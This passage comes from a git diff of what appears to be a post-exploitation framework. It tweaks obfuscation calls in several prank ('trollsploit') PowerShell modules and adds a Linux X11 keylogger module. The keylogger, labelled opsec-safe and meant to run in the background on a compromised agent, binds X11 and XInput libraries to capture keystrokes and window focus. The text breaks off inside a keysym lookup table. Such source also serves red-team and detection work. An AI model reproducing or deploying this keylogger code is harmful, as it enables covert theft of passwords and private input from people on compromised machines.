helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/trollsploit/voicetroll.py b/lib/modules/powershell/trollsploit/voicetroll.py index 2d0eb80..1e7e021 100644 --- a/lib/modules/powershell/trollsploit/voicetroll.py +++ b/lib/modules/powershell/trollsploit/voicetroll.py @@ -85,5 +85,5 @@ Invoke-VoiceTroll""" else: script += " -" + str(option) + " \"" + str(values['Value'].strip("\"")) + "\"" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/trollsploit/wallpaper.py b/lib/modules/powershell/trollsploit/wallpaper.py index cdb21c5..d970f24 100644 --- a/lib/modules/powershell/trollsploit/wallpaper.py +++ b/lib/modules/powershell/trollsploit/wallpaper.py @@ -143,5 +143,5 @@ namespace Wallpaper script += "; 'Set-Wallpaper executed'" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/trollsploit/wlmdr.py b/lib/modules/powershell/trollsploit/wlmdr.py index 62d76a9..f647c6d 100644 --- a/lib/modules/powershell/trollsploit/wlmdr.py +++ b/lib/modules/powershell/trollsploit/wlmdr.py @@ -108,5 +108,5 @@ Invoke-Wlrmdr""" else: script += " -" + str(option) + " \"" + str(values['Value'].strip("\"")) + "\"" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/python/collection/linux/xkeylogger.py b/lib/modules/python/collection/linux/xkeylogger.py new file mode 100644 index 0000000..090d23e --- /dev/null +++ b/lib/modules/python/collection/linux/xkeylogger.py @@ -0,0 +1,789 @@ +class Module: + + def __init__(self, mainMenu, params=[]): + + # metadata info about the module, not modified during runtime + self.info = { + # name for the module that will appear in module menus + 'Name': 'Keylog', + + # list of one or more authors for the module + 'Author': ['Nikaiw'], + + # more verbose multi-line description of the module + 'Description': ("X userland keylogger based on pupy"), + + # True if the module needs to run in the background + 'Background': True, + + # File extension to save the file as + 'OutputExtension': "", + + # if the module needs administrative privileges + 'NeedsAdmin': False, + + # True if the method doesn't touch disk/is reasonably opsec safe + 'OpsecSafe': True, + + # the module language + 'Language' : 'python', + + # the minimum language version needed + 'MinLanguageVersion' : '2.6', + + # list of any references/other comments + 'Comments': [ + "WIP, might miss some keys, can't kill agent sometimes" + ] + } + + # any options needed by the module, settable during runtime + self.options = { + # format: + # value_name : {description, required, default_value} + 'Agent': { + # The 'Agent' option is the only one that MUST be in a module + 'Description' : 'Agent to keylog.', + 'Required' : True, + 'Value' : '' + }, + } + + # save off a copy of the mainMenu object to access external functionality + # like listeners/agent handlers/etc. + self.mainMenu = mainMenu + + # During instantiation, any settable option parameters + # are passed as an object set to the module and the + # options dictionary is automatically set. This is mostly + # in case options are passed on the command line + if params: + for param in params: + # parameter format is [Name, Value] + option, value = param + if option in self.options: + self.options[option]['Value'] = value + + def generate(self, obfuscate=False, obfuscationCommand=""): + + script = """# -*- coding: utf-8 -*- +# inspired from https://github.com/amoffat/pykeylogger +import sys +from time import sleep, time, strftime +import ctypes as ct +from ctypes.util import find_library + +try: + x11 = ct.cdll.LoadLibrary(find_library('X11')) + + x11.XkbOpenDisplay.restype = ct.c_void_p + x11.XkbOpenDisplay.argtypes = [ + ct.c_char_p, + ct.c_void_p, ct.c_void_p, ct.c_void_p, ct.c_void_p, ct.c_void_p + ] + x11.XCloseDisplay.argtypes = [ ct.c_void_p ] + x11.XQueryKeymap.restype = ct.c_int + x11.XQueryKeymap.argtypes = [ ct.c_void_p, ct.c_void_p ] + x11.XGetInputFocus.restype = ct.c_int + x11.XGetInputFocus.argtypes = [ ct.c_void_p, ct.c_void_p, ct.c_void_p ] + x11.XInternAtom.restype = ct.c_ulong + x11.XInternAtom.argtypes = [ ct.c_void_p, ct.c_char_p, ct.c_byte] + x11.XGetWMName.restype = ct.c_int + x11.XGetWMName.argtypes = [ct.c_void_p, ct.c_ulong, ct.c_void_p] + x11.XQueryTree.restype = ct.c_int + x11.XQueryTree.argtypes = [ct.c_void_p, ct.c_ulong, ct.c_void_p, ct.c_void_p, ct.POINTER(ct.c_ulong), ct.POINTER(ct.c_uint)] + x11.XGetClassHint.restype = ct.c_int + x11.XGetClassHint.argtypes = [ ct.c_void_p, ct.c_ulong, ct.c_void_p ] + x11.XkbGetKeyboard.restype = ct.c_void_p + x11.XkbGetKeyboard.argtypes = [ ct.c_void_p, ct.c_uint, ct.c_uint ] + x11.XkbGetState.argtypes = [ ct.c_void_p, ct.c_uint, ct.c_void_p ] + x11.XKeycodeToKeysym.restype = ct.c_uint + x11.XKeycodeToKeysym.argtypes = [ ct.c_void_p, ct.c_uint ] + x11.XkbKeycodeToKeysym.restype = ct.c_uint + x11.XkbKeycodeToKeysym.argtypes = [ ct.c_void_p, ct.c_uint ] + x11.XDefaultRootWindow.restype = ct.c_ulong + x11.XDefaultRootWindow.argtypes = [ ct.c_void_p ] + x11.XNextEvent.argtypes = [ ct.c_void_p, ct.c_void_p ] + x11.XMapWindow.argtypes = [ ct.c_void_p, ct.c_ulong ] + x11.XSync.argtypes = [ ct.c_void_p, ct.c_int ] + x11.XMaskEvent.argtypes = [ ct.c_void_p, ct.c_ulong, ct.c_void_p ] + x11.XSelectInput.argtypes = [ ct.c_void_p, ct.c_uint, ct.c_long ] + x11.XDestroyWindow.argtypes = [ ct.c_void_p, ct.c_ulong ] + x11.XGetEventData.argtypes = [ ct.c_void_p, ct.c_void_p ] + x11.XFreeEventData.argtypes = [ ct.c_void_p, ct.c_void_p ] + x11.XQueryExtension.argtypes = [ ct.c_void_p, ct.c_char_p, ct.c_void_p, ct.c_void_p, ct.c_void_p ] + x11.XGetWindowProperty.argtypes = [ ct.c_void_p, ct.c_ulong, ct.c_ulong, ct.c_long, ct.c_long, ct.c_int, + ct.c_ulong, ct.c_void_p, ct.c_void_p, ct.c_void_p, ct.c_void_p, ct.POINTER(ct.c_char_p)] + x11.XGetWindowProperty.restype = ct.c_int +except: + x11 = None + +try: + xi = ct.cdll.LoadLibrary(find_library('Xi')) + xi.XOpenDevice.restype = ct.c_void_p + xi.XOpenDevice.argtypes = [ ct.c_void_p, ct.c_uint ] + xi.XCloseDevice.argtypes = [ ct.c_void_p, ct.c_void_p ] + xi.XISelectEvents.argtypes = [ ct.c_void_p, ct.c_uint, ct.c_void_p, ct.c_int ] +except: + xi = None + + + +class ClassHint(ct.Structure): + _fields_ = [ + ( "name", ct.c_char_p ), + ( "klass", ct.c_char_p ) + ] + +class XkbState(ct.Structure): + _fields_ = [ + ( "group", ct.c_char ), + ( "locked_group", ct.c_char ), + ( "base_group", ct.c_char ), + ( "latched_group", ct.c_char ), + ( "mods", ct.c_char ), + ( "base_mods", ct.c_char ), + ( "latched_mods", ct.c_char ), + ( "locked_mods", ct.c_char ), + ( "compat_state", ct.c_char ), + ( "grab_mods", ct.c_char ), + ( "compat_grab_mods", ct.c_char ), + ( "lookup_mods", ct.c_char ), + ( "compat_lookup_mods", ct.c_char ), + ( "ptr_buttons", ct.c_char ) + ] + +class XiEventMask(ct.Structure): + _fields_ = [ + ( "deviceid", ct.c_int ), + ( "mask_len", ct.c_int ), + ( "mask", ct.c_void_p ) + ] + +class XGenericEventCookie(ct.Structure): + _fields_ = [ + ( "type", ct.c_int ), + ( "serial", ct.c_ulong ), + ( "send_event", ct.c_int ), + ( "display", ct.c_void_p ), + ( "extension", ct.c_int ), + ( "evtype", ct.c_int ), + ( "cookie", ct.c_uint ), + ( "data", ct.c_void_p ) + ] + +class XEventType(ct.Structure): + _fields_ = [ + ( "type", ct.c_int ), + ( "pad", ct.c_long * 24 ) + ] + +class XEvent(ct.Union): + _fields_ = [ + ( "type", XEventType ), + ( "cookie", XGenericEventCookie ), + ] + +class XIValuatorState(ct.Structure): + _fields_ = [ + ( "mask_len", ct.c_int ), + ( "mask", ct.c_void_p ), + ( "values", ct.c_void_p ), + ] + +class XIButtonState(ct.Structure): + _fields_ = [ + ( "mask_len", ct.c_int ), + ( "mask", ct.c_void_p ) + ] + +class XIModifierState(ct.Structure): + _fields_ = [ + ( "base", ct.c_int ), + ( "latched", ct.c_int ), + ( "locked", ct.c_int ), + ( "effective", ct.c_int ), + ] + +class XIDeviceEvent(ct.Structure): + _fields_ = [ + ( "type", ct.c_int ), + ( "serial", ct.c_ulong ), + ( "send_event", ct.c_int ), + ( "display", ct.c_void_p ), + ( "extension", ct.c_int ), + ( "evtype", ct.c_int ), + ( "time", ct.c_ulong ), + ( "deviceid", ct.c_int ), + ( "sourceid", ct.c_int ), + ( "detail", ct.c_int ), + ( "root", ct.c_ulong), + ( "event", ct.c_ulong ), + ( "child", ct.c_ulong ), + ( "root_x", ct.c_double ), + ( "root_y", ct.c_double ), + ( "event_x", ct.c_double ), + ( "event_y", ct.c_double ), + ( "flags", ct.c_int ), + ( "buttons" , XIButtonState ), + ( "valuators", XIValuatorState ), + ( "mods", XIModifierState ), + ( "group", XIModifierState ), + ] + +class XTextProperty(ct.Structure): + _fields_ = [("value" , ct.c_char_p), + ("encoding" , ct.c_ulong), + ("format" , ct.c_int), + ("nitems" , ct.c_ulong)] + +def XiMaxLen(): + return (((27) >> 3) + 1) + +def XiSetMask(mask, event): + mask[(event)>>3] |= (1 << ((event) & 7)) + +def keysym_to_XK(ks): + return { + 0xff08: "BackSpace", 0xff09: "Tab", 0xff0a: "Linefeed", 0xff0b: "Clear", + 0xff0d: "Return", 0xff13: "Pause", 0xff14: "Scroll_Lock", 0xff15: "Sys_Req", + 0xff1b: "Escape", 0xffff: "Delete", 0xff20: "Multi_key", 0xff37: "Codeinput", + 0xff3c: "SingleCandidate", 0xff3d: "MultipleCandidate", 0xff3e: "PreviousCandidate", 0xff21: "Kanji", + 0xff22: "Muhenkan", 0xff23: "Henkan_Mode", 0xff23: "Henkan", 0xff24: "Romaji", + 0xff25: "Hiragana", 0xff26: "Katakana", 0xff27: "Hiragana_Katakana", 0xff28: "Zenkaku", + 0xff29: "Hankaku", 0xff2a: "Zenkaku_Hankaku", 0xff2b: "Touroku", 0xff2c: "Massyo", + 0xff2d: "Kana_Lock", 0xff2e: "Kana_Shift", 0xff2f: "Eisu_Shift", 0xff30: "Eisu_toggle", + 0xff37: "Kanji_Bangou", 0xff3d: "Zen_Koho", 0xff3e: "Mae_Koho", 0xff50: "Home", + 0xff51: "Left", 0xff52: "Up", 0xff53: "Right", 0xff54: "Down", + 0xff55: "Prior", 0xff55: "Page_Up", 0xff56: "Next", 0xff56: "Page_Down", + 0xff57: "End", 0xff58: "Begin", 0xff60: "Select", 0xff61: "Print", + 0xff62: "Execute", 0xff63: "Insert", 0xff65: "Undo", 0xff66: "Redo", + 0xff67: "Menu", 0xff68: "Find", 0xff69: "Cancel", 0xff6a: "Help", + 0xff6b: "Break", 0xff7e: "Mode_switch", 0xff7e: "script_switch", 0xff7f: "Num_Lock", + 0xff80: "KP_Space", 0xff89: "KP_Tab", 0xff8d: "KP_Enter", 0xff91: "KP_F1", + 0xff92: "KP_F2", 0xff93: "KP_F3", 0xff94: "KP_F4", 0xff95: "KP_Home", + 0xff96: "KP_Left", 0xff97: "KP_Up", 0xff98: "KP_Right", 0xff99: "KP_Down", + 0xff9a: "KP_Prior", 0xff9a: "KP_Page_Up", 0xff9b: "KP_Next", 0xff9b: "KP_Page_Down", + 0xff9c: "KP_End", 0xff9d: "KP_Begin", 0xff9e: "KP_Insert", 0xff9f: "KP_Delete", + 0xffbd: "KP_Equal", 0xffaa: "KP_Multiply", 0xffab: "KP_Add", 0xffac: "KP_Separator", + 0xffad: "KP_Subtract", 0xffae: "KP_Decimal", 0xffaf: "KP_Divide", 0xffb0: "KP_0", + 0xffb1: "KP_1", 0xffb2: "KP_2", 0xffb3: "KP_3", 0xffb4: "KP_4", + 0xffb5: "KP_5", 0xffb6: "KP_6", 0xffb7: "KP_7", 0xffb8: "KP_8", + 0xffb9: "KP_9", 0xffbe: "F1", 0xffbf: "F2", 0xffc0: "F3", + 0xffc1: "F4", 0xffc2: "F5", 0xffc3: "F6", 0xffc4: "F7", + 0xffc5: "F8", 0xffc6: "F9", 0xffc7: "F10", 0xffc8: "F11", + 0xffc8: "L1", 0xffc9: "F12", 0xffc9: "L2", 0xffca: "F13", + 0xffca: "L3", 0xffcb: "F14", 0xffcb: "L4", 0xffcc: "F15", + 0xffcc: "L5", 0xffcd: "F16", 0xffcd: "L6", 0xffce: "F17", + 0xffce: "L7", 0xffcf: "F18", 0xffcf: "L8", 0xffd0: "F19", + 0xffd0: "L9", 0xffd1: "F20", 0xffd1: "L10", 0xffd2: "F21", + 0xffd2: "R1", 0xffd3: "F22", 0xffd3: "R2", 0xffd4: "F23", + 0xffd4: "R3", 0xffd5: "F24", 0xffd5: "R4", 0xffd6: "F25", + 0xffd6: "R5", 0xffd7: "F26", 0xffd7: "R6", 0xffd8: "F27", + 0xffd8: "R7", 0xffd9: "F28", 0xffd9: "R8", 0xffda: "F29", + 0xffda: "R9", 0xffdb: "F30", 0xffdb: "R10", 0xffdc: "F31", + 0xffdc: "R11", 0xffdd: "F32", 0xffdd: "R12", 0xffde: "F33", + 0xffde: "R13", 0xffdf: "F34", 0xffdf: "R14", 0xffe0: "F35", + 0xffe0: "R15", 0xffe1: "Shift_L", 0xffe2: "Shift_R", 0xffe3: "Control_L", + 0xffe4: "Control_R", 0xffe5: "Caps_Lock", 0xffe6: "Shift_Lock", 0xffe7: "Meta_L", + 0xffe8: "Meta_R", 0xffe9: "Alt_L", 0xffea: "Alt_R", 0xffeb: "Super_L", + 0xffec: "Super_R", 0xffed: "Hyper_L", 0xffee: "Hyper_R", 0xff7e: "ISO_Group_Shift", + 0xff7e: "kana_switch", 0xff7e: "Arabic_switch", 0xff7e: "Greek_switch", 0xff7e: "Hebrew_switch", + 0xff31: "Hangul", 0xff32: "Hangul_Start", 0xff33: "Hangul_End", 0xff34: "Hangul_Hanja", + 0xff35: "Hangul_Jamo", 0xff36: "Hangul_Romaja", 0xff37: "Hangul_Codeinput", 0xff38: "Hangul_Jeonja", + 0xff39: "Hangul_Banja", 0xff3a: "Hangul_PreHanja", 0xff3b: "Hangul_PostHanja", + 0xff3c: "Hangul_SingleCandidate", 0xff3d: "Hangul_MultipleCandidate", + 0xff3e: "Hangul_PreviousCandidate", 0xff3f: "Hangul_Special", + 0xff7e: "Hangul_switch", 0xfff1: "braille_dot_1", 0xfff2: "braille_dot_2", 0xfff3: "braille_dot_3", + 0xfff4: "braille_dot_4", 0xfff5: "braille_dot_5", 0xfff6: "braille_dot_6", 0xfff7: "braille_dot_7", + 0xfff8: "braille_dot_8", 0xfff9: "braille_dot_9", 0xfffa: "braille_dot_10" + }.get(ks) + +def keysym_to_unicode(ks): + # https://raw.githubusercontent.com/substack/node-keysym/master/data/keysyms.txt + return { + 0x0020: u'\\u0020', 0x0021: u'\\u0021', 0x0022: u'\\u0022', 0x0023: u'\\u0023', 0x0024: u'\\u0024', + 0x0025: u'\\u0025', 0x0026: u'\\u0026', 0x0027: u'\\u0027', 0x0027: u'\\u0027', 0x0028: u'\\u0028', + 0x0029: u'\\u0029', 0x002a: u'\\u002a', 0x002b: u'\\u002b', 0x002c: u'\\u002c', 0x002d: u'\\u002d', + 0x002e: u'\\u002e', 0x002f: u'\\u002f', 0x0030: u'\\u0030', 0x0031: u'\\u0031', 0x0032: u'\\u0032', + 0x0033: u'\\u0033', 0x0034: u'\\u0034', 0x0035: u'\\u0035', 0x0036: u'\\u0036', 0x0037: u'\\u0037', + 0x0038: u'\\u0038', 0x0039: u'\\u0039', 0x003a: u'\\u003a', 0x003b: u'\\u003b', 0x003c: u'\\u003c', + 0x003d: u'\\u003d', 0x003e: u'\\u003e', 0x003f: u'\\u003f', 0x0040: u'\\u0040', 0x0041: u'\\u0041', + 0x0042: u'\\u0042', 0x0043: u'\\u0043', 0x0044: u'\\u0044', 0x0045: u'\\u0045', 0x0046: u'\\u0046', + 0x0047: u'\\u0047', 0x0048: u'\\u0048', 0x0049: u'\\u0049', 0x004a: u'\\u004a', 0x004b: u'\\u004b', + 0x004c: u'\\u004c', 0x004d: u'\\u004d', 0x004e: u'\\u004e', 0x004f: u'\\u004f', 0x0050: u'\\u0050', + 0x0051: u'\\u0051', 0x0052: u'\\u0052', 0x0053: u'\\u0053', 0x0054: u'\\u0054', 0x0055: u'\\u0055', + 0x0056: u'\\u0056', 0x0057: u'\\u0057', 0x0058: u'\\u0058', 0x0059: u'\\u0059', 0x005a: u'\\u005a', + 0x005b: u'\\u005b', 0x005c: u'\\u005c', 0x005d: u'\\u005d', 0x005e: u'\\u005e', 0x005f: u'\\u005f', + 0x0060: u'\\u0060', 0x0060: u'\\u0060', 0x0061: u'\\u0061', 0x0062: u'\\u0062', 0x0063: u'\\u0063', + 0x0064: u'\\u0064', 0x0065: u'\\u0065', 0x0066: u'\\u0066', 0x0067: u'\\u0067', 0x0068: u'\\u0068', + 0x0069: u'\\u0069', 0x006a: u'\\u006a', 0x006b: u'\\u006b', 0x006c: u'\\u006c', 0x006d: u'\\u006d', + 0x006e: u'\\u006e', 0x006f: u'\\u006f', 0x0070: u'\\u0070', 0x0071: u'\\u0071', 0x0072: u'\\u0072', + 0x0073: u'\\u0073', 0x0074: u'\\u0074', 0x0075: u'\\u0075', 0x0076: u'\\u0076', 0x0077: u'\\u0077', + 0x0078: u'\\u0078', 0x0079: u'\\u0079', 0x007a: u'\\u007a', 0x007b: u'\\u007b', 0x007c: u'\\u007c', + 0x007d: u'\\u007d', 0x007e: u'\\u007e', 0x00a0: u'\\u00a0', 0x00a1: u'\\u00a1', 0x00a2: u'\\u00a2', + 0x00a3: u'\\u00a3', 0x00a4: u'\\u00a4', 0x00a5: u'\\u00a5', 0x00a6: u'\\u00a6', 0x00a7: u'\\u00a7', + 0x00a8: u'\\u00a8', 0x00a9: u'\\u00a9', 0x00aa: u'\\u00aa', 0x00ab: u'\\u00ab', 0x00ac: u'\\u00ac', + 0x00ad: u'\\u00ad', 0x00ae: u'\\u00ae', 0x00af: u'\\u00af', 0x00b0: u'\\u00b0', 0x00b1: u'\\u00b1', + 0x00b2: u'\\u00b2', 0x00b3: u'\\u00b3', 0x00b4: u'\\u00b4', 0x00b5: u'\\u00b5', 0x00b6: u'\\u00b6', + 0x00b7: u'\\u00b7', 0x00b8: u'\\u00b8', 0x00b9: u'\\u00b9', 0x00ba: u'\\u00ba', 0x00bb: u'\\u00bb', + 0x00bc: u'\\u00bc', 0x00bd: u'\\u00bd', 0x00be: u'\\u00be', 0x00bf: u'\\u00bf', 0x00c0: u'\\u00c0', + 0x00c1: u'\\u00c1', 0x00c2: u'\\u00c2', 0x00c3: u'\\u00c3', 0x00c4: u'\\u00c4', 0x00c5: u'\\u00c5', + 0x00c6: u'\\u00c6', 0x00c7: u'\\u00c7', 0x00c8: u'\\u00c8', 0x00c9: u'\\u00c9', 0x00ca: u'\\u00ca', + 0x00cb: u'\\u00cb', 0x00cc: u'\\u00cc', 0x00cd: u'\\u00cd', 0x00ce: u'\\u00ce', 0x00cf: u'\\u00cf', + 0x00d0: u'\\u00d0', 0x00d0: u'\\u00d0', 0x00d1: u'\\u00d1', 0x00d2: u'\\u00d2', 0x00d3: u'\\u00d3', + 0x00d4: u'\\u00d4', 0x00d5: u'\\u00d5', 0x00d6: u'\\u00d6', 0x00d7: u'\\u00d7', 0x00d8: u'\\u00d8', + 0x00d9: u'\\u00d9', 0x00da: u'\\u00da', 0x00db: u'\\u00db', 0x00dc: u'\\u00dc', 0x00dd: u'\\u00dd', + 0x00de: u'\\u00de', 0x00de: u'\\u00de', 0x00df: u'\\u00df', 0x00e0: u'\\u00e0', 0x00e1: u'\\u00e1', + 0x00e2: u'\\u00e2', 0x00e3: u'\\u00e3', 0x00e4: u'\\u00e4', 0x00e5: u'\\u00e5', 0x00e6: u'\\u00e6', + 0x00e7: u'\\u00e7', 0x00e8: u'\\u00e8', 0x00e9: u'\\u00e9', 0x00ea: u'\\u00ea', 0x00eb: u'\\u00eb', + 0x00ec: u'\\u00ec', 0x00ed: u'\\u00ed', 0x00ee: u'\\u00ee', 0x00ef: u'\\u00ef', 0x00f0: u'\\u00f0', + 0x00f1: u'\\u00f1', 0x00f2: u'\\u00f2', 0x00f3: u'\\u00f3', 0x00f4: u'\\u00f4', 0x00f5: u'\\u00f5', + 0x00f6: u'\\u00f6', 0x00f7: u'\\u00f7', 0x00f8: u'\\u00f8', 0x00f9: u'\\u00f9', 0x00fa: u'\\u00fa', + 0x00fb: u'\\u00fb', 0x00fc: u'\\u00fc', 0x00fd: u'\\u00fd', 0x00fe: u'\\u00fe', 0x00ff: u'\\u00ff', + 0x01a1: u'\\u0104', 0x01a2: u'\\u02d8', 0x01a3: u'\\u0141', 0x01a5: u'\\u013d', 0x01a6: u'\\u015a', + 0x01a9: u'\\u0160', 0x01aa: u'\\u015e', 0x01ab: u'\\u0164', 0x01ac: u'\\u0179', 0x01ae: u'\\u017d', + 0x01af: u'\\u017b', 0x01b1: u'\\u0105', 0x01b2: u'\\u02db', 0x01b3: u'\\u0142', 0x01b5: u'\\u013e', + 0x01b6: u'\\u015b', 0x01b7: u'\\u02c7', 0x01b9: u'\\u0161', 0x01ba: u'\\u015f', 0x01bb: u'\\u0165', + 0x01bc: u'\\u017a', 0x01bd: u'\\u02dd', 0x01be: u'\\u017e', 0x01bf: u'\\u017c', 0x01c0: u'\\u0154', + 0x01c3: u'\\u0102', 0x01c5: u'\\u0139', 0x01c6: u'\\u0106', 0x01c8: u'\\u010c', 0x01ca: u'\\u0118', + 0x01cc: u'\\u011a', 0x01cf: u'\\u010e', 0x01d0: u'\\u0110', 0x01d1: u'\\u0143', 0x01d2: u'\\u0147', + 0x01d5: u'\\u0150', 0x01d8: u'\\u0158', 0x01d9: u'\\u016e', 0x01db: u'\\u0170', 0x01de: u'\\u0162', + 0x01e0: u'\\u0155', 0x01e3: u'\\u0103', 0x01e5: u'\\u013a', 0x01e6: u'\\u0107', 0x01e8: u'\\u010d', + 0x01ea: u'\\u0119', 0x01ec: u'\\u011b', 0x01ef: u'\\u010f', 0x01f0: u'\\u0111', 0x01f1: u'\\u0144', + 0x01f2: u'\\u0148', 0x01f5: u'\\u0151', 0x01f8: u'\\u0159', 0x01f9: u'\\u016f', 0x01fb: u'\\u0171', + 0x01fe: u'\\u0163', 0x01ff: u'\\u02d9', 0x02a1: u'\\u0126', 0x02a6: u'\\u0124', 0x02a9: u'\\u0130', + 0x02ab: u'\\u011e', 0x02ac: u'\\u0134', 0x02b1: u'\\u0127', 0x02b6: u'\\u0125', 0x02b9: u'\\u0131', + 0x02bb: u'\\u011f', 0x02bc: u'\\u0135', 0x02c5: u'\\u010a', 0x02c6: u'\\u0108', 0x02d5: u'\\u0120', + 0x02d8: u'\\u011c', 0x02dd: u'\\u016c', 0x02de: u'\\u015c', 0x02e5: u'\\u010b', 0x02e6: u'\\u0109', + 0x02f5: u'\\u0121', 0x02f8: u'\\u011d', 0x02fd: u'\\u016d', 0x02fe: u'\\u015d', 0x03a2: u'\\u0138', + 0x03a3: u'\\u0156', 0x03a5: u'\\u0128', 0x03a6: u'\\u013b', 0x03aa: u'\\u0112', 0x03ab: u'\\u0122', + 0x03ac: u'\\u0166', 0x03b3: u'\\u0157', 0x03b5: u'\\u0129', 0x03b6: u'\\u013c', 0x03ba: u'\\u0113', + 0x03bb: u'\\u0123', 0x03bc: u'\\u0167', 0x03bd: u'\\u014a', 0x03bf: u'\\u014b', 0x03c0: u'\\u0100', + 0x03c7: u'\\u012e', 0x03cc: u'\\u0116', 0x03cf: u'\\u012a', 0x03d1: u'\\u0145', 0x03d2: u'\\u014c', + 0x03d3: u'\\u0136', 0x03d9: u'\\u0172', 0x03dd: u'\\u0168', 0x03de: u'\\u016a', 0x03e0: u'\\u0101', + 0x03e7: u'\\u012f', 0x03ec: u'\\u0117', 0x03ef: u'\\u012b', 0x03f1: u'\\u0146', 0x03f2: u'\\u014d', + 0x03f3: u'\\u0137', 0x03f9: u'\\u0173', 0x03fd: u'\\u0169', 0x03fe: u'\\u016b', 0x047e: u'\\u203e', + 0x04a1: u'\\u3002', 0x04a2: u'\\u300c', 0x04a3: u'\\u300d', 0x04a4: u'\\u3001', 0x04a5: u'\\u30fb', + 0x04a6: u'\\u30f2', 0x04a7: u'\\u30a1', 0x04a8: u'\\u30a3', 0x04a9: u'\\u30a5', 0x04aa: u'\\u30a7', + 0x04ab: u'\\u30a9', 0x04ac: u'\\u30e3', 0x04ad: u'\\u30e5', 0x04ae: u'\\u30e7', 0x04af: u'\\u30c3', + 0x04b0: u'\\u30fc', 0x04b1: u'\\u30a2', 0x04b2: u'\\u30a4', 0x04b3: u'\\u30a6', 0x04b4: u'\\u30a8', + 0x04b5: u'\\u30aa', 0x04b6: u'\\u30ab', 0x04b7: u'\\u30ad', 0x04b8: u'\\u30af', 0x04b9: u'\\u30b1', + 0x04ba: u'\\u30b3', 0x04bb: u'\\u30b5', 0x04bc: u'\\u30b7', 0x04bd: u'\\u30b9', 0x04be: u'\\u30bb', + 0x04bf: u'\\u30bd', 0x04c0: u'\\u30bf', 0x04c1: u'\\u30c1', 0x04c2: u'\\u30c4', 0x04c3: u'\\u30c6', + 0x04c4: u'\\u30c8', 0x04c5: u'\\u30ca', 0x04c6: u'\\u30cb', 0x04c7: u'\\u30cc', 0x04c8: u'\\u30cd', + 0x04c9: u'\\u30ce', 0x04ca: u'\\u30cf', 0x04cb: u'\\u30d2', 0x04cc: u'\\u30d5', 0x04cd: u'\\u30d8', + 0x04ce: u'\\u30db', 0x04cf: u'\\u30de', 0x04d0: u'\\u30df', 0x04d1: u'\\u30e0', 0x04d2: u'\\u30e1', + 0x04d3: u'\\u30e2', 0x04d4: u'\\u30e4', 0x04d5: u'\\u30e6', 0x04d6: u'\\u30e8', 0x04d7: u'\\u30e9', + 0x04d8: u'\\u30ea', 0x04d9: u'\\u30eb', 0x04da: u'\\u30ec', 0x04db: u'\\u30ed', 0x04dc: u'\\u30ef', + 0x04dd: u'\\u30f3', 0x04de: u'\\u309b', 0x04df: u'\\u309c', 0x05ac: u'\\u060c', 0x05bb: u'\\u061b', + 0x05bf: u'\\u061f', 0x05c1: u'\\u0621', 0x05c2: u'\\u0622', 0x05c3: u'\\u0623', 0x05c4: u'\\u0624', + 0x05c5: u'\\u0625', 0x05c6: u'\\u0626', 0x05c7: u'\\u0627', 0x05c8: u'\\u0628', 0x05c9: u'\\u0629', + 0x05ca: u'\\u062a', 0x05cb: u'\\u062b', 0x05cc: u'\\u062c', 0x05cd: u'\\u062d', 0x05ce: u'\\u062e', + 0x05cf: u'\\u062f', 0x05d0: u'\\u0630', 0x05d1: u'\\u0631', 0x05d2: u'\\u0632', 0x05d3: u'\\u0633', + 0x05d4: u'\\u0634', 0x05d5: u'\\u0635', 0x05d6: u'\\u0636', 0x05d7: u'\\u0637', 0x05d8: u'\\u0638', + 0x05d9: u'\\u0639', 0x05da: u'\\u063a', 0x05e0: u'\\u0640', 0x05e1: u'\\u0641', 0x05e2: u'\\u0642', + 0x05e3: u'\\u0643', 0x05e4: u'\\u0644', 0x05e5: u'\\u0645', 0x05e6: u'\\u0646', 0x05e7: u'\\u0647', + 0x05e8: u'\\u0648', 0x05e9: u'\\u0649', 0x05ea: u'\\u064a', 0x05eb: u'\\u064b', 0x05ec: u'\\u064c', + 0x05ed: u'\\u064d', 0x05ee: u'\\u064e', 0x05ef: u'\\u064f', 0x05f0: u'\\u0650', 0x05f1: u'\\u0651', + 0x05f2: u'\\u0652', 0x06a1: u'\\u0452', 0x06a2: u'\\u0453', 0x06a3: u'\\u0451', 0x06a4: u'\\u0454', + 0x06a5: u'\\u0455', 0x06a6: u'\\u0456', 0x06a7: u'\\u0457', 0x06a8: u'\\u0458', 0x06a9: u'\\u0459', + 0x06aa: u'\\u045a', 0x06ab: u'\\u045b', 0x06ac: u'\\u045c', 0x06ae: u'\\u045e', 0x06af: u'\\u045f', + 0x06b0: u'\\u2116', 0x06b1: u'\\u0402', 0x06b2: u'\\u0403', 0x06b3: u'\\u0401', 0x06b4: u'\\u0404', + 0x06b5: u'\\u0405', 0x06b6: u'\\u0406', 0x06b7: u'\\u0407', 0x06b8: u'\\u0408', 0x06b9: u'\\u0409', + 0x06ba: u'\\u040a', 0x06bb: u'\\u040b', 0x06bc: u'\\u040c', 0x06be: u'\\u040e', 0x06bf: u'\\u040f', + 0x06c0: u'\\u044e', 0x06c1: u'\\u0430', 0x06c2: u'\\u0431', 0x06c3: u'\\u0446', 0x06c4: u'\\u0434', + 0x06c5: u'\\u0435', 0x06c6: u'\\u0444', 0x06c7: u'\\u0433', 0x06c8: u'\\u0445', 0x06c9: u'\\u0438', + 0x06ca: u'\\u0439', 0x06cb: u'\\u043a', 0x06cc: u'\\u043b', 0x06cd: u'\\u043c', 0x06ce: u'\\u043d', + 0x06cf: u'\\u043e', 0x06d0: u'\\u043f', 0x06d1: u'\\u044f', 0x06d2: u'\\u0440', 0x06d3: u'\\u0441', + 0x06d4: u'\\u0442', 0x06d5: u'\\u0443', 0x06d6: u'\\u0436', 0x06d7: u'\\u0432', 0x06d8: u'\\u044c', + 0x06d9: u'\\u044b', 0x06da: u'\\u0437', 0x06db: u'\\u0448', 0x06dc: u'\\u044d', 0x06dd: 